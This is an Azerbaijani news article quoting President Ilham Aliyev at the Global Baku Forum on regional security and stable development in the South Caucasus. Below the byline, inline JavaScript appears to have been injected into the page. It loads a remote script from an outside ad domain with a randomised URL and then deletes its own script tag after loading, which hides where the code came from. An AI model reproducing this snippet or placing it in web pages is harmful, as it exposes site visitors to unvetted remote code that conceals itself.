İlham Əliyev: “İstəyirik ki, Cənubi Qafqazda stabillik, dayanıqlı inkişaf olsun”

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Mən Azərbaycan Prezidenti kimi ölkəmizin təhlükəsizlik məsələləri ilə məşğul oluram. Qarabağ münaqişəsinin həll edilməsi regionda sülh və təhlükəsizlik üçün yeni imkanlar yaradıb”. 

Oxu.Az-ın məlumatına əsasən, bunu Prezident İlham Əliyev Nizami Gəncəvi Beynəlxalq Mərkəzinin təşkilatçılığı ilə “Qlobal dünya nizamına təhdidlər” mövzusunda keçirilən Qlobal Bakı Forumunun açılış mərasimində deyib.

İlham Əliyevin sözlərinə görə, bir çox nümayəndə Azərbaycanın işğaldan azad etdiyi ərazilərə səfərlər edir.

“Mən istərdim ki, Azərbaycanın postmüharibə dövrünün vəziyyəti ilə bağlı yanaşmasını ifadə edim. Bu situasiya Cənubi Qafqazda regional təhlükəsizliklə əlaqəlidir”, – deyə İlham Əliyev əlavə edib.

O bildirib ki, indi Azərbaycan sülhdən danışır.

“Biz istəyirik ki, Cənubi Qafqazda stabillik, dayanıqlı inkişaf olsun”, – deyə Prezident qeyd edib. 

Aqşin Kərimov

Oxu.az

Bu yazılara da göz atın...